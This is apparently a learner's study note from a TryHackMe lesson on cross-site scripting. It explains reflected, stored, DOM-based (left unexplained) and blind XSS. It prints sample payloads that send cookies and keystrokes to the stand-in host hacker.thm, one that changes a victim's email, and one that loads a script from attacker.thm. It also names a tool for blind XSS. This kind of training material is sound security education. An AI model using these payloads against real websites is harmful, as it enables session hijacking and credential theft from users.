# What is Cross-Site Scripting
An attack where you inject malicious JavaScript into a trusted website's output, causing those scripts to execute in a victim's browser when they view the compromised page.<br>

All you need is the intention and the modification to fit the scenario.<br>

## Example Payloads
- Proof of concept: `<script>alert('attack successful');</script> `
- Session stealing: `<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>`
- Key Logger: `<script>document.onkeypress = function(e) {fetch('https://hacker.thm/steal?key=' + btoa(e.key) );}</script>`
- Business Logic: `<script>user.changeEmail('attacker@hacker.thm');</script>` (assuming that there is a JavaScript function in the page `user.changeEmail()`

There are different types of XSS vulnerabilities, and they require slightly different payloads and user interaction.

# Reflected XSS
When user-supplied data in the HTTP request is reflected on the webpage source without any validation. Eg:
```
https://website.thm/?error=Invalid Input Detected

<div>
  <p>Invalid Input Detected<p>
</div>
```
The application doesn't check the contents of the error parameter, which allows the attacker to insert malicious code.
```
https://website.thm/?error=<script src="https://attacker.thm/evil.js"></script>

<div>
  <p><script src="https://attacker.thm/evil.js"></script><p>
</div>
```
Depending on where the script is reflected in the code, you might have to change the payload.<br>

Parameters in the query string isn't the only place that reflected XSS vulnerability maybe arise. It can also be in URL file paths or in the HTTP header. <br>

Attackers have to send the malicious link the the victim first and get them to go to the malicious website by clicking on the link.

# Stored XSS
Unlike reflected XSS, stored XSS is stored on the web application (in the database for example) and is run whenever users visit the website.

## Example scenario
Suppose a website has a comment field that allows users to post comments which is stored in the database. If the comments are checked for whether they contain malicious JavaScript code, an attacker can post a comment containing their payload, which will be stored in the web application's database. Now, users who visit the website will run the JavaScript in their browser, which steals their cookies.<br>

## Testing for stored XSS
Test every possible point of entry where data may be stored and then shown back on the web page to other users.
- Commnents on a blog
- User Profile Information
- Website Listings

Sometimes developers think limiting input values on the client-side is good enough protection, so changing values to something the web application wouldn't be expecting is a good source of discovering stored XSS, for example, an age field that is expecting an integer from a dropdown menu, but instead, you manually send the request rather than using the form allowing you to try malicious payloads. <br>

# DOM-based XSS
Unsure what this is, THM didn't do a good job explaining it.

# Blind XSS
A variant of stored XSS, but you can't see if the payload was successful or to test it against yourself first.

## Example scenario
A website has a contact form where you can message a member of staff. The message content doesn't get checked for any malicious code, which allows the attacker to enter anything they wish. These messages then get turned into support tickets which staff view on a private web portal.<br>

Using the correct payload, the attacker's JavaScript could make calls back to an attacker's website, revealing the staff portal URL, the staff member's cookies, and even the contents of the portal page that is being viewed. Now the attacker could potentially hijack the staff member's session and have access to the private portal.<br>

A popular tool for Blind XSS attacks is [XSS Hunter Express](https://github.com/mandatoryprogrammer/xsshunter-express). This tool will automatically capture cookies, URLs, page contents and more.


